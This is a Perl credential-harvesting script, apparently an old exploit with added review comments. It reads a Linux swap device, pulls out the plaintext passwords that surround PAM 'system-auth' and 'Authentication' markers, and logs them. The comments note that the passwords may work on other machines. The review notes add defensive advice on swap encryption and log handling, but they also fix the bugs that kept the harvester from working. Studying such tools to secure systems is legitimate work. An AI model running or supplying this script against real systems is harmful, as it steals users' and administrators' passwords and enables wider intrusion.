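#!/usr/bin/perl
#
# swap.pl - scan a swap device for text left between two PAM-related markers
#           and append every hit to a log file.
#
# Issue as described by the original author (tested on Red Hat 6.2 - 8.0):
#   When root or another user mistypes a password (failed login), the
#   password typed at the next login (the correct one) can end up in the
#   swap area in plain text. Reading swap needs uid or gid 0, or access to
#   the hard drive. The author notes that a password recovered this way may
#   also be valid on other machines run by the same administrator, so
#   password reuse widens the impact.
#
# Usage:   ./swap.pl <swap_device> <log_file>
# Example: ./swap.pl /dev/hdc3 /tmp/log
#
# The log holds raw bytes taken from swap. The author recommends a viewer
# that tolerates binary data (e.g. `mc -v log`), because editors such as
# pico will not read the file correctly. A hit looks roughly like:
#   .........imal33tlam3.......... ..root.x.0:0:root./root./bin/bash........
# where, per the author, the string ahead of the passwd-style entry is the
# password.
#
# NOTE(review), defensive takeaways, not part of the original text:
#   - Swap can hold whatever was in process memory; encrypting swap and
#     restricting raw block-device access limit this kind of exposure.
#   - The log file contains candidate credentials. Keep it off shared
#     directories and remove it once the analysis is done.
#
# Written by spai - mk102_7@kb.csu.ru, gameover@pisem.net.
# Gr33tz 2 irc.dal.net.ru, #xakep

use strict;
use warnings;

my ($swap, $log) = @ARGV;

if (@ARGV < 2) {
    print "\nFirstly read comments to swap.pl.\n";
    print "This script helps to find plaint text password in swap file.\n";
    print "You must be 0 uid or 0 gid user to use swap.pl.\n\n";
    # The argument placeholders were missing from the usage line.
    print "Usage: ./swap.pl <swap_device> <log_file>\n";
    print "Example: ./swap.pl /dev/hdc6 /tmp/log\n";
    exit;
}

# The log receives plaintext secrets: a log created by this run must not be
# readable by group or others.
umask 0077;

# Three-argument open with lexical handles: the script is meant to run as
# root, and the two-argument form would let a crafted argument (leading '>',
# trailing '|', ...) select the open mode or start a command.
open(my $swap_fh, '<', $swap)
    or die "Error: $swap - no such file or your uid/gid !==0\n";
# NOTE(review): appending as root to a path in a world-writable directory
# (the example uses /tmp) follows symlinks; prefer a root-owned directory.
open(my $log_fh, '>>', $log)
    or die "Error: $log - can't create log file";

# The read from the swap handle was missing from the loop condition
# (`while ()`), so the original loop never consumed any input.
while (my $line = <$swap_fh>) {
    next unless $line =~ /system-auth/;

    # Keep what follows the first "system-auth" marker. The explicit limit
    # of 3 is what a two-variable list assignment from split implies.
    my (undef, $after_marker) = split /system-auth/, $line, 3;
    next unless $after_marker =~ /Authentication/;

    # Log only the bytes that precede the "Authentication" marker.
    my ($fragment) = split /Authentication/, $after_marker, 3;
    print {$log_fh} $fragment;
}

# Buffered write errors only surface at close, so check it for the log.
close $log_fh or die "Error: $log - write failed: $!\n";
close $swap_fh;
exit;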